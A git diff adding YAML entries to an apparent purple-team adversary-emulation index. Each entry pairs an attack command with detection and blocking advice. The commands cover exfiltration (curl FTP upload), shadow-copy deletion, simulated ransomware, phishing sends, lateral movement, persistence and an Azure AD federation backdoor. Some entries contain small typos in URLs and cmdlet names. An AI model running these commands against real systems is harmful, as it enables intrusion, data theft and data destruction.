+  x_vectr_id: 4266c26e-0470-4b97-8dc3-1d24fe35f586
+  isv: 1
diff --git a/rh-index-2024/techniques/Discovery/672f8861-c914-4f58-b861-5107ce19f61c.yml b/rh-index-2024/techniques/Discovery/672f8861-c914-4f58-b861-5107ce19f61c.yml
new file mode 100644
index 0000000..b1e1235
--- /dev/null
+++ b/rh-index-2024/techniques/Discovery/672f8861-c914-4f58-b861-5107ce19f61c.yml
@@ -0,0 +1,22 @@
+name: BloodHound DC enumeration
+description: Use BloodHound/SharpHound to perform enumeration of domain resources against a domain controller
+platforms:
+guidance:
+- cmd> SharpHound.exe -c DcOnly
+block:
+- ''
+detect:
+- Windows enumeration activities detected from large amount of network traffic (SMB, ARP, SAMR, etc) via UEBA-like or network monitoring tools
+- Enable object logging for directory services via Group Policy Advanced Audit then configure a SACL on Active Directory objects. Trigger an alert when multiple (high-value) objects are accessed by a single source in a short period using object access logs for the directory service objects (Evevnt ID 4656, 4663)
+- https://blog.blacklanternsecurity.com/p/detecting-ldap-recoannaissance
+controls:
+- SIEM
+- Identity Threat Protection
+metadata:
+  id: 672f8861-c914-4f58-b861-5107ce19f61c
+  tid: T1087.002
+  tactic: TA0007
+  x_tools:
+  - https://github.com/BloodHoundAD/SharpHound
+  x_vectr_id: 672f8861-c914-4f58-b861-5107ce19f61c
+  isv: 1
diff --git a/rh-index-2024/techniques/Discovery/7e9f21a6-1f5c-4f4a-894e-55ea9daaf0d2.yml b/rh-index-2024/techniques/Discovery/7e9f21a6-1f5c-4f4a-894e-55ea9daaf0d2.yml
new file mode 100644
index 0000000..0502f98
--- /dev/null
+++ b/rh-index-2024/techniques/Discovery/7e9f21a6-1f5c-4f4a-894e-55ea9daaf0d2.yml
@@ -0,0 +1,23 @@
+name: Enumerate domain groups and users using net
+description: Enumerate domain users and domain groups using the builtin net.exe
+platforms:
+- windows
+guidance:
+- cmd> net user /domain
+- cmd> net group /domain
+- cmd> net group "Domain Admins" /domain
+- cmd> net group "Domain Computers" /domain
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+- Use process create events (e.g. Event ID 4688) to identify anomalous process invocation as compared to a baseline of process invocations by user and/or user characteristics (e.g. department). Base comparisons on the process/image name rather than the command line where possible.
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+  id: 7e9f21a6-1f5c-4f4a-894e-55ea9daaf0d2
+  tid: T1087.002
+  tactic: TA0007
+  x_vectr_id: 7e9f21a6-1f5c-4f4a-894e-55ea9daaf0d2
+  isv: 1
diff --git a/rh-index-2024/techniques/Discovery/9064e91a-be78-48a5-9112-28d5701d6d51.yml b/rh-index-2024/techniques/Discovery/9064e91a-be78-48a5-9112-28d5701d6d51.yml
new file mode 100644
index 0000000..1c91bac
--- /dev/null
+++ b/rh-index-2024/techniques/Discovery/9064e91a-be78-48a5-9112-28d5701d6d51.yml
@@ -0,0 +1,19 @@
+name: Retrieve system information
+description: Retrieve information about the system using multiple builtin commands
+platforms:
+- windows
+guidance:
+- CMD> systeminfo ipconfig tasklist sc query wmic product get
+block:
+- ''
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+  id: 9064e91a-be78-48a5-9112-28d5701d6d51
+  tid: T1082
+  tactic: TA0007
+  x_vectr_id: 9064e91a-be78-48a5-9112-28d5701d6d51
+  isv: 1
diff --git a/rh-index-2024/techniques/Discovery/bc85f11b-e481-4afb-a5f5-db26e5c07433.yml b/rh-index-2024/techniques/Discovery/bc85f11b-e481-4afb-a5f5-db26e5c07433.yml
new file mode 100644
index 0000000..e73f4ce
--- /dev/null
+++ b/rh-index-2024/techniques/Discovery/bc85f11b-e481-4afb-a5f5-db26e5c07433.yml
@@ -0,0 +1,20 @@
+name: Domain Controller discovery via nltest
+description: Use nltest.exe to identify domain controllers in the domain
+platforms:
+- windows
+guidance:
+- cmd> nltest.exe /dclist:{{ domain }}
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+- Use process create events (e.g. Event ID 4688) to identify anomalous process invocation as compared to a baseline of process invocations by user and/or user characteristics (e.g. department). Base comparisons on the process/image name rather than the command line where possible.
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+  id: bc85f11b-e481-4afb-a5f5-db26e5c07433
+  tid: T1018
+  tactic: TA0007
+  x_vectr_id: bc85f11b-e481-4afb-a5f5-db26e5c07433
+  isv: 1
diff --git a/rh-index-2024/techniques/Execution/a7134d71-dc49-41a8-a309-ec520c96a089.yml b/rh-index-2024/techniques/Execution/a7134d71-dc49-41a8-a309-ec520c96a089.yml
new file mode 100644
index 0000000..867c552
--- /dev/null
+++ b/rh-index-2024/techniques/Execution/a7134d71-dc49-41a8-a309-ec520c96a089.yml
@@ -0,0 +1,22 @@
+name: Macro - Remote Template
+description: Execute a malicious Office document on the endpoint that will load a macro stored in a remote template document
+platforms:
+- windows
+guidance:
+block:
+- Macro execution is blocked by GPO policy
+- Suspicious process execution/behavior blocked by endpoint security tool
+- Payload on disk deleted/quarantined by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+- Payload on disk triggers an alert with endpoint security tool
+controls:
+- Endpoint Protection
+- Hardening
+- SIEM
+metadata:
+  id: a7134d71-dc49-41a8-a309-ec520c96a089
+  tid: T1221
+  tactic: TA0005
+  x_vectr_id: a7134d71-dc49-41a8-a309-ec520c96a089
+  isv: 1
diff --git a/rh-index-2024/techniques/Exfiltration/11b7a86e-4596-4df9-a2a9-705096756d28.yml b/rh-index-2024/techniques/Exfiltration/11b7a86e-4596-4df9-a2a9-705096756d28.yml
new file mode 100644
index 0000000..fff885f
--- /dev/null
+++ b/rh-index-2024/techniques/Exfiltration/11b7a86e-4596-4df9-a2a9-705096756d28.yml
@@ -0,0 +1,20 @@
+name: Extract sensitive data over FTP
+description: Exfiltrate data from the internal network to an external system via FTP
+platforms:
+guidance:
+- https://dlptest.com/ftp-test/
+- shell> curl --ftp-create-dirs -T {{ local_file }} ftp://{{ username }}:{{ password }}@{{ server }}/{{ dest_path }}
+block:
+- Outbound connections over FTP are blocked by network security configurations
+- Sensitive data sent over the network is blocked by network DLP tool
+detect:
+- Sensitive data sent over the network is detected by network DLP tool
+controls:
+- DLP
+- Firewall
+metadata:
+  id: 11b7a86e-4596-4df9-a2a9-705096756d28
+  tid: T1048.003
+  tactic: TA0010
+  x_vectr_id: 11b7a86e-4596-4df9-a2a9-705096756d28
+  isv: 1
diff --git a/rh-index-2024/techniques/Exfiltration/7d63d9d1-0bb4-41b5-9fe2-785bad419860.yml b/rh-index-2024/techniques/Exfiltration/7d63d9d1-0bb4-41b5-9fe2-785bad419860.yml
new file mode 100644
index 0000000..77e983d
--- /dev/null
+++ b/rh-index-2024/techniques/Exfiltration/7d63d9d1-0bb4-41b5-9fe2-785bad419860.yml
@@ -0,0 +1,19 @@
+name: Extract sensitive data over HTTP
+description: Extract data from the network over HTTP tcp/80 to an external host or IP.
+platforms:
+guidance:
+- http://dlptest.com/http-post/
+block:
+- Sensitive data sent over the network is blocked by network DLP tool
+detect:
+- Sensitive data sent over the network is detected by network DLP tool
+controls:
+- Firewall
+- DLP
+- Web Gateway
+metadata:
+  id: 7d63d9d1-0bb4-41b5-9fe2-785bad419860
+  tid: T1048.003
+  tactic: TA0010
+  x_vectr_id: 7d63d9d1-0bb4-41b5-9fe2-785bad419860
+  isv: 1
diff --git a/rh-index-2024/techniques/Exfiltration/9b1ad734-9b2b-4e12-8a7c-dacd2cddfb66.yml b/rh-index-2024/techniques/Exfiltration/9b1ad734-9b2b-4e12-8a7c-dacd2cddfb66.yml
new file mode 100644
index 0000000..b807191
--- /dev/null
+++ b/rh-index-2024/techniques/Exfiltration/9b1ad734-9b2b-4e12-8a7c-dacd2cddfb66.yml
@@ -0,0 +1,19 @@
+name: Extract data to cloud storage service
+description: Extract data from the internal network to a cloud storage service like MEGA, Google Drive, or Box
+platforms:
+guidance:
+block:
+- Sensitive data sent over the network is blocked by network DLP tool
+- Network security tool detects connection to domain based on category from proxy or DNS
+detect:
+- Sensitive data sent over the network is detected by network DLP tool
+controls:
+- Firewall
+- DLP
+- Web Gateway
+metadata:
+  id: 9b1ad734-9b2b-4e12-8a7c-dacd2cddfb66
+  tid: T1567.002
+  tactic: TA0010
+  x_vectr_id: 9b1ad734-9b2b-4e12-8a7c-dacd2cddfb66
+  isv: 1
diff --git a/rh-index-2024/techniques/Exfiltration/b48fa856-d004-4d5a-918f-d9429a9cd8e3.yml b/rh-index-2024/techniques/Exfiltration/b48fa856-d004-4d5a-918f-d9429a9cd8e3.yml
new file mode 100644
index 0000000..3c2f885
--- /dev/null
+++ b/rh-index-2024/techniques/Exfiltration/b48fa856-d004-4d5a-918f-d9429a9cd8e3.yml
@@ -0,0 +1,20 @@
+name: Extract sensitive data over HTTP C2
+description: Extract data from the network via an HTTP C2 channel over tcp/80 to external host or IP
+platforms:
+guidance:
+- implant> download {{ file }}
+block:
+- Sensitive data sent over the network is blocked by network DLP tool
+- C2 channel is blocked by proxy, firewall, or network behavioral/UEBA tool
+detect:
+- C2 channel is detected by proxy, firewall, or network behavioral/UEBA tool
+controls:
+- Firewall
+- DLP
+- Web Gateway
+metadata:
+  id: b48fa856-d004-4d5a-918f-d9429a9cd8e3
+  tid: T1041
+  tactic: TA0010
+  x_vectr_id: b48fa856-d004-4d5a-918f-d9429a9cd8e3
+  isv: 1
diff --git a/rh-index-2024/techniques/Impact/31d4a02d-4a66-4740-a9c4-8814319fd5c4.yml b/rh-index-2024/techniques/Impact/31d4a02d-4a66-4740-a9c4-8814319fd5c4.yml
new file mode 100644
index 0000000..2dbf5f4
--- /dev/null
+++ b/rh-index-2024/techniques/Impact/31d4a02d-4a66-4740-a9c4-8814319fd5c4.yml
@@ -0,0 +1,20 @@
+name: Delete shadows with vssadmin.exe
+description: Delete volume shadow copies on the host to inhibit file system recovery
+platforms:
+- windows
+guidance:
+- CMD> vssadmin.exe delete shadows /all /quiet
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+- Suspicious Volume Shadow Service use detected in the SIEM using telemetry
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+  id: 31d4a02d-4a66-4740-a9c4-8814319fd5c4
+  tid: T1490
+  tactic: TA0040
+  x_vectr_id: 31d4a02d-4a66-4740-a9c4-8814319fd5c4
+  isv: 1
diff --git a/rh-index-2024/techniques/Impact/45591791-541b-4a27-bda9-75e6d78a66f4.yml b/rh-index-2024/techniques/Impact/45591791-541b-4a27-bda9-75e6d78a66f4.yml
new file mode 100644
index 0000000..4e63384
--- /dev/null
+++ b/rh-index-2024/techniques/Impact/45591791-541b-4a27-bda9-75e6d78a66f4.yml
@@ -0,0 +1,16 @@
+name: Modify group policy object
+description: Modify a domain group policy object. This can be used for activities like persisting access to the environment, disabling security controls, and executing ransomware on domain systems.
+platforms:
+guidance:
+block:
+- ''
+detect:
+- Configure auditing on group policy objects then look for anomalous changes, such as those performed by unexpected principals or changes occuring outside of expected business processes
+controls:
+- SIEM
+metadata:
+  id: 45591791-541b-4a27-bda9-75e6d78a66f4
+  tid: T1484.001
+  tactic: TA0005
+  x_vectr_id: 45591791-541b-4a27-bda9-75e6d78a66f4
+  isv: 1
diff --git a/rh-index-2024/techniques/Impact/72224b97-93d1-4087-8b82-6b4342bf2e09.yml b/rh-index-2024/techniques/Impact/72224b97-93d1-4087-8b82-6b4342bf2e09.yml
new file mode 100644
index 0000000..f6c2e88
--- /dev/null
+++ b/rh-index-2024/techniques/Impact/72224b97-93d1-4087-8b82-6b4342bf2e09.yml
@@ -0,0 +1,20 @@
+name: Encrypt a large amount of files
+description: Encrypt a large amount of files on the endpoint to simulate ransomware
+platforms:
+guidance:
+- cmd> coldcryptor.exe run {{ extension }}
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+- Detect common ransomware extensions using file system telemetry
+controls:
+- Endpoint Protection
+metadata:
+  id: 72224b97-93d1-4087-8b82-6b4342bf2e09
+  tid: T1486
+  tactic: TA0040
+  x_tools:
+  - https://github.com/2XXE-SRA/payload_resources/tree/master/coldencryptor
+  x_vectr_id: 72224b97-93d1-4087-8b82-6b4342bf2e09
+  isv: 1
diff --git a/rh-index-2024/techniques/InitialAccess/1f9d5363-ddf4-41c3-8bc3-f80595219206.yml b/rh-index-2024/techniques/InitialAccess/1f9d5363-ddf4-41c3-8bc3-f80595219206.yml
new file mode 100644
index 0000000..b95efea
--- /dev/null
+++ b/rh-index-2024/techniques/InitialAccess/1f9d5363-ddf4-41c3-8bc3-f80595219206.yml
@@ -0,0 +1,16 @@
+name: Suspicious service use
+description: Interact with a service from an unexpected geolocation and with an unexpected user-agent to simulate suspicious use of the target service. This can occur, for example, when a user's token is stolen via a phishing attack then used by an attacker to assume their session and access a service.
+platforms:
+guidance:
+block:
+- ''
+detect:
+- Baseline application use for users using application logs then generate alerts for instances where the usage occurs from comparatively anomalous geolocations
+controls:
+- SIEM
+metadata:
+  id: 1f9d5363-ddf4-41c3-8bc3-f80595219206
+  tid: T1078
+  tactic: TA0001
+  x_vectr_id: 1f9d5363-ddf4-41c3-8bc3-f80595219206
+  isv: 1
diff --git a/rh-index-2024/techniques/InitialAccess/609515fe-24e0-4bc2-a069-a3d815e68ec2.yml b/rh-index-2024/techniques/InitialAccess/609515fe-24e0-4bc2-a069-a3d815e68ec2.yml
new file mode 100644
index 0000000..7e31368
--- /dev/null
+++ b/rh-index-2024/techniques/InitialAccess/609515fe-24e0-4bc2-a069-a3d815e68ec2.yml
@@ -0,0 +1,17 @@
+name: Suspicious external employee login
+description: Login to an external employee portal from an unexpected geolocation and with an unexpected user-agent to simulate a suspicious login attempt.
+platforms:
+guidance:
+block:
+- Suspicious logins originating from select geolocations are blocked
+detect:
+- Baseline login events for users using authentication logs then generate alerts for instances where the logins occur from comparatively anomalous geolocations
+controls:
+- SIEM
+- IdP
+metadata:
+  id: 609515fe-24e0-4bc2-a069-a3d815e68ec2
+  tid: T1078
+  tactic: TA0001
+  x_vectr_id: 609515fe-24e0-4bc2-a069-a3d815e68ec2
+  isv: 1
diff --git a/rh-index-2024/techniques/InitialAccess/97f1da56-79a3-4181-a491-8de9f93b05af.yml b/rh-index-2024/techniques/InitialAccess/97f1da56-79a3-4181-a491-8de9f93b05af.yml
new file mode 100644
index 0000000..a4d1696
--- /dev/null
+++ b/rh-index-2024/techniques/InitialAccess/97f1da56-79a3-4181-a491-8de9f93b05af.yml
@@ -0,0 +1,17 @@
+name: Attachment - Zipped macro
+description: Send a malicious macro-enabled Office document in a ZIP archive to a target user in an email.
+platforms:
+guidance:
+- PS> Send-MailMessage -SmtpServer {{ maildomain }} -UseSSL -BodyAsHTML -Subject {{ subject }} -Body {{ body }} -To {{ target }} -From {{ noreply@maildomain }} -Attachments {{ attachment }}
+block:
+- Malicious email blocked/quarantined or attachment inside email stripped by email gateway
+detect:
+- Malicious email alerted on by email gateway
+controls:
+- Mail Gateway
+metadata:
+  id: 97f1da56-79a3-4181-a491-8de9f93b05af
+  tid: T1566.001
+  tactic: TA0001
+  x_vectr_id: 97f1da56-79a3-4181-a491-8de9f93b05af
+  isv: 1
diff --git a/rh-index-2024/techniques/InitialAccess/ba6b3115-f8f6-4b28-bb24-ad5dfad6b4b7.yml b/rh-index-2024/techniques/InitialAccess/ba6b3115-f8f6-4b28-bb24-ad5dfad6b4b7.yml
new file mode 100644
index 0000000..daf292b
--- /dev/null
+++ b/rh-index-2024/techniques/InitialAccess/ba6b3115-f8f6-4b28-bb24-ad5dfad6b4b7.yml
@@ -0,0 +1,16 @@
+name: Prompt a user with multiple MFA requests
+description: Using valid credentials for a user, prompt that user with multiple MFA requests in a short period of time in order to induce them to accept the prompt.
+platforms:
+guidance:
+block:
+- Prevent sign-ins from users with anomalous login characteristics, such as an unknown geolocation or device fingerprint
+detect:
+- Baseline MFA requests for users using authentication logs then generate alerts for instances where the amount of MFA requests for a user significantly exceeds the baseline within a short time period (e.g. <1 hour).
+controls:
+- IdP
+metadata:
+  id: ba6b3115-f8f6-4b28-bb24-ad5dfad6b4b7
+  tid: T1621
+  tactic: TA0006
+  x_vectr_id: ba6b3115-f8f6-4b28-bb24-ad5dfad6b4b7
+  isv: 1
diff --git a/rh-index-2024/techniques/InitialAccess/ccf6d4a6-879e-4a7c-a2ae-6273437fc658.yml b/rh-index-2024/techniques/InitialAccess/ccf6d4a6-879e-4a7c-a2ae-6273437fc658.yml
new file mode 100644
index 0000000..1eae23d
--- /dev/null
+++ b/rh-index-2024/techniques/InitialAccess/ccf6d4a6-879e-4a7c-a2ae-6273437fc658.yml
@@ -0,0 +1,17 @@
+name: Attachment - ISO
+description: Send phishing email to victim containing an ISO attachment. ISO files can be used to bypass mark-of-the-web restrictions.
+platforms:
+guidance:
+- PS> Send-MailMessage -SmtpServer {{ maildomain }} -UseSSL -BodyAsHTML -Subject {{ subject }} -Body {{ body }} -To {{ target }} -From {{ noreply@maildomain }} -Attachments {{ attachment }}
+block:
+- Malicious email blocked/quarantined or link inside email rewritten/stripped by email gateway
+detect:
+- Malicious email alerted on by email gateway
+controls:
+- Mail Gateway
+metadata:
+  id: ccf6d4a6-879e-4a7c-a2ae-6273437fc658
+  tid: T1566.001
+  tactic: TA0001
+  x_vectr_id: ccf6d4a6-879e-4a7c-a2ae-6273437fc658
+  isv: 1
diff --git a/rh-index-2024/techniques/LateralMovement/0735ef7e-438f-4fc9-a656-7d11d73fbc61.yml b/rh-index-2024/techniques/LateralMovement/0735ef7e-438f-4fc9-a656-7d11d73fbc61.yml
new file mode 100644
index 0000000..775b96d
--- /dev/null
+++ b/rh-index-2024/techniques/LateralMovement/0735ef7e-438f-4fc9-a656-7d11d73fbc61.yml
@@ -0,0 +1,20 @@
+name: Lateral Movement via RDP
+description: Perform an interactive logons to a Windows system via RDP
+platforms:
+- windows
+guidance:
+- CMD> mstsc /v:{{ target }}
+block:
+- Host-based firewalls prevent direct communications over common ports/protocols
+detect:
+- Anomalous remote access patterns detected by UEBA/UEBA-like tool and/or in the SIEM using telemetry, such as Windows authentication events (Event ID 4624, 4648), as compared to a baseline of remote access activities for the initiating principal
+controls:
+- SIEM
+- Identity Threat Protection
+- Hardening
+metadata:
+  id: 0735ef7e-438f-4fc9-a656-7d11d73fbc61
+  tid: T1021.001
+  tactic: TA0008
+  x_vectr_id: 0735ef7e-438f-4fc9-a656-7d11d73fbc61
+  isv: 1
diff --git a/rh-index-2024/techniques/LateralMovement/3c337f53-d086-4f2f-818a-08fb1a1c5f79.yml b/rh-index-2024/techniques/LateralMovement/3c337f53-d086-4f2f-818a-08fb1a1c5f79.yml
new file mode 100644
index 0000000..807596c
--- /dev/null
+++ b/rh-index-2024/techniques/LateralMovement/3c337f53-d086-4f2f-818a-08fb1a1c5f79.yml
@@ -0,0 +1,23 @@
+name: Lateral Movement via WMI
+description: Move to another system by using Windows Management Instrumentation (WMI) to spawn a process on that target system
+platforms:
+- windows
+guidance:
+- CMD> wmic /node:"{{ target }}" process call create "{{ command }}"
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+- Host-based firewalls prevent direct communications over common ports/protocols
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+- Anomalous remote access patterns detected by UEBA/UEBA-like tool and/or in the SIEM using telemetry, such as Windows authentication events (Event ID 4624, 4648), as compared to a baseline of remote access activities for the initiating principal
+controls:
+- Endpoint Protection
+- SIEM
+- Identity Threat Protection
+- Hardening
+metadata:
+  id: 3c337f53-d086-4f2f-818a-08fb1a1c5f79
+  tid: T1021.003
+  tactic: TA0008
+  x_vectr_id: 3c337f53-d086-4f2f-818a-08fb1a1c5f79
+  isv: 1
diff --git a/rh-index-2024/techniques/LateralMovement/9b5396f2-6e4a-498a-995e-47e48a99bf76.yml b/rh-index-2024/techniques/LateralMovement/9b5396f2-6e4a-498a-995e-47e48a99bf76.yml
new file mode 100644
index 0000000..508dc52
--- /dev/null
+++ b/rh-index-2024/techniques/LateralMovement/9b5396f2-6e4a-498a-995e-47e48a99bf76.yml
@@ -0,0 +1,24 @@
+name: Lateral Movement via PsExec
+description: Move to another system by creating a service remotely via Sysinternals PsExec
+platforms:
+- windows
+guidance:
+- CMD> psexec -s \{{ target }} {{ command }}
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+- Host-based firewalls prevent direct communications over common ports/protocols
+- Remote access to the service control manager is blocked by a DACL, preventing service creation by remote users
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+- Anomalous remote access patterns detected by UEBA/UEBA-like tool and/or in the SIEM using telemetry, such as Windows authentication events (Event ID 4624, 4648), as compared to a baseline of remote access activities for the initiating principal
+controls:
+- Endpoint Protection
+- SIEM
+- Identity Threat Protection
+- Hardening
+metadata:
+  id: 9b5396f2-6e4a-498a-995e-47e48a99bf76
+  tid: T1021.002
+  tactic: TA0008
+  x_vectr_id: 9b5396f2-6e4a-498a-995e-47e48a99bf76
+  isv: 1
diff --git a/rh-index-2024/techniques/LateralMovement/b74ff4c5-eebf-466b-af85-341b19c4c748.yml b/rh-index-2024/techniques/LateralMovement/b74ff4c5-eebf-466b-af85-341b19c4c748.yml
new file mode 100644
index 0000000..c373b4f
--- /dev/null
+++ b/rh-index-2024/techniques/LateralMovement/b74ff4c5-eebf-466b-af85-341b19c4c748.yml
@@ -0,0 +1,20 @@
+name: Remote .exe copy
+description: Copy an .exe payload to a temp folder on the remote target
+platforms:
+guidance:
+- cmd> copy {{ exe }} \\{{ target }}\{{ share }}\{{ path }}
+block:
+- Host-based firewalls prevent direct communications over common ports/protocols
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+- Anomalous remote access patterns detected by UEBA/UEBA-like tool and/or in the SIEM using telemetry, such as Windows authentication events (Event ID 4624, 4648), as compared to a baseline of remote access activities for the initiating principal
+controls:
+- Endpoint Protection
+- Antivirus
+- SIEM
+metadata:
+  id: b74ff4c5-eebf-466b-af85-341b19c4c748
+  tid: T1570
+  tactic: TA0008
+  x_vectr_id: b74ff4c5-eebf-466b-af85-341b19c4c748
+  isv: 1
diff --git a/rh-index-2024/techniques/Persistence/05d0ccbf-9f9f-4046-b5f0-09c149623f96.yml b/rh-index-2024/techniques/Persistence/05d0ccbf-9f9f-4046-b5f0-09c149623f96.yml
new file mode 100644
index 0000000..a58486f
--- /dev/null
+++ b/rh-index-2024/techniques/Persistence/05d0ccbf-9f9f-4046-b5f0-09c149623f96.yml
@@ -0,0 +1,23 @@
+name: Register a new device in Azure AD
+description: Register a new device in Azure AD
+platforms:
+- azuread
+guidance:
+- PS> Join-AADIntDeviceToAurzeAD -DeviceName {{ name }} -DeviceType "purple" -OSVersion "1"
+block:
+- 'Prevent users outside of approved groups from being able to register new devices in the tenant. Refer to documentation for details: https://learn.microsoft.com/en-us/azure/active-directory/devices/device-management-azure-portal#configure-device-settings'
+detect:
+- Detect anomalous device registration events by using Azure audit logs
+controls:
+- SIEM
+- Hardening
+metadata:
+  id: 05d0ccbf-9f9f-4046-b5f0-09c149623f96
+  tid: T1098.005
+  tactic: TA0003
+  x_tools:
+  - AADInternals
+  x_references:
+  - htpts://aadinternals.nom/post/prt/
+  x_vectr_id: 05d0ccbf-9f9f-4046-b5f0-09c149623f96
+  isv: 1
diff --git a/rh-index-2024/techniques/Persistence/0bcb2080-b140-4a1c-9e79-8512a18882d8.yml b/rh-index-2024/techniques/Persistence/0bcb2080-b140-4a1c-9e79-8512a18882d8.yml
new file mode 100644
index 0000000..6a86c5e
--- /dev/null
+++ b/rh-index-2024/techniques/Persistence/0bcb2080-b140-4a1c-9e79-8512a18882d8.yml
@@ -0,0 +1,21 @@
+name: Persist via new local administrator
+description: Create a new local user then add them to the "Administrators" group using the builtin net.exe
+platforms:
+- windows
+guidance:
+- CMD> net user /add {{ username }} {{ password }}
+- CMD> net localgroup administrators {{ username }} /add
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+- Use group modification events (Event ID 4728) to identify additions to local security groups.
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+  id: 0bcb2080-b140-4a1c-9e79-8512a18882d8
+  tid: T1136.001
+  tactic: TA0003
+  x_vectr_id: 0bcb2080-b140-4a1c-9e79-8512a18882d8
+  isv: 1
diff --git a/rh-index-2024/techniques/Persistence/20a6dace-d801-42f5-b659-6cf91e39d273.yml b/rh-index-2024/techniques/Persistence/20a6dace-d801-42f5-b659-6cf91e39d273.yml
new file mode 100644
index 0000000..cd00901
--- /dev/null
+++ b/rh-index-2024/techniques/Persistence/20a6dace-d801-42f5-b659-6cf91e39d273.yml
@@ -0,0 +1,20 @@
+name: Persist via new scheduled task
+description: Persist on a system by creating a new scheduled task
+platforms:
+- windows
+guidance:
+- cmd> schtasks.exe /create /sc daily /tn {{ task_name }} /tr {{ command }} /st 20:00
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+- Use scheduled task creation events (Event ID 4698) to identify newly created scheduled tasks. Look specifically for events that are anomalous as compared to other task creation events in the environment, such as events where the command is unique across all other tasks and events created by principals that do not commonly create tasks.
+controls:
+- SIEM
+- Endpoint Protection
+metadata:
+  id: 20a6dace-d801-42f5-b659-6cf91e39d273
+  tid: T1053.005
+  tactic: TA0003
+  x_vectr_id: 20a6dace-d801-42f5-b659-6cf91e39d273
+  isv: 1
diff --git a/rh-index-2024/techniques/Persistence/5c24b470-4a3b-4de0-8adf-3d63bc8d5737.yml b/rh-index-2024/techniques/Persistence/5c24b470-4a3b-4de0-8adf-3d63bc8d5737.yml
new file mode 100644
index 0000000..d43b8c9
--- /dev/null
+++ b/rh-index-2024/techniques/Persistence/5c24b470-4a3b-4de0-8adf-3d63bc8d5737.yml
@@ -0,0 +1,20 @@
+name: Persist via new Windows service
+description: Persist on a system by creating a new service
+platforms:
+- windows
+guidance:
+- CMD> sc create {{ service_name }} binPath= "{{ command }}"
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+- Use services creation events (Event ID 4697) to identify newly created services. Look specifically for events that are anomalous as compared to other service creation events in the environment, such as events where the command is unique across all other services and events created by principals that do not commonly create services.
+controls:
+- SIEM
+- Endpoint Protection
+metadata:
+  id: 5c24b470-4a3b-4de0-8adf-3d63bc8d5737
+  tid: T1543.003
+  tactic: TA0003
+  x_vectr_id: 5c24b470-4a3b-4de0-8adf-3d63bc8d5737
+  isv: 1
diff --git a/rh-index-2024/techniques/Persistence/ab8bd5d9-b8cb-43e6-a632-03aef9e9a622.yml b/rh-index-2024/techniques/Persistence/ab8bd5d9-b8cb-43e6-a632-03aef9e9a622.yml
new file mode 100644
index 0000000..a323aaa
--- /dev/null
+++ b/rh-index-2024/techniques/Persistence/ab8bd5d9-b8cb-43e6-a632-03aef9e9a622.yml
@@ -0,0 +1,20 @@
+name: Persist via Registry Winlogon Shell
+description: Run a payload during user login by setting a Registry Winlogon key
+platforms:
+- windows
+guidance:
+- CMD> reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /f "{{ command }}"
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+- Enable object logging for the Registry via Group Policy Advanced Audit then configure a SACL on the Registry either directly or via the global audit settings in Group Policy. Trigger an alert when modification are made the Registry using object access logs (Event ID 4656).
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+  id: ab8bd5d9-b8cb-43e6-a632-03aef9e9a622
+  tid: T1547.004
+  tactic: TA0003
+  x_vectr_id: ab8bd5d9-b8cb-43e6-a632-03aef9e9a622
+  isv: 1
diff --git a/rh-index-2024/techniques/Persistence/b07b0ea7-24ed-49c2-bfc8-a6b14060a7c1.yml b/rh-index-2024/techniques/Persistence/b07b0ea7-24ed-49c2-bfc8-a6b14060a7c1.yml
new file mode 100644
index 0000000..0a122f8
--- /dev/null
+++ b/rh-index-2024/techniques/Persistence/b07b0ea7-24ed-49c2-bfc8-a6b14060a7c1.yml
@@ -0,0 +1,23 @@
+name: Configure a custom federated domain
+description: Convert a custom domain in the Azure Active Directory tenant into a federated domain. This can be used for persistent access into the tenant.
+platforms:
+- azuread
+guidance:
+- PS> ConvertTo-AADIntBackdoor -AccessToken {{ access_token }} -DomainName "{{ domain }}"
+block:
+- ''
+detect:
+- Monitor for unusual domain federation via the SEIM. Examine AAD logs for actions that "Set domain authentication" to "federated".
+- https://www.inversecos.com/2021/11/how-to-detect-azure-active-directory.html
+controls:
+- SIEM
+metadata:
+  id: b07b0ea7-24ed-49c2-bfc8-a6b14060a7c1
+  tid: T1484.002
+  tactic: TA0003
+  x_tools:
+  - AADInternals
+  x_references:
+  - https://o365blog.com/post/aadbackdoor/
+  x_vectr_id: b07b0ea7-24ed-49c2-bfc8-a6b14060a7c1
+  isv: 1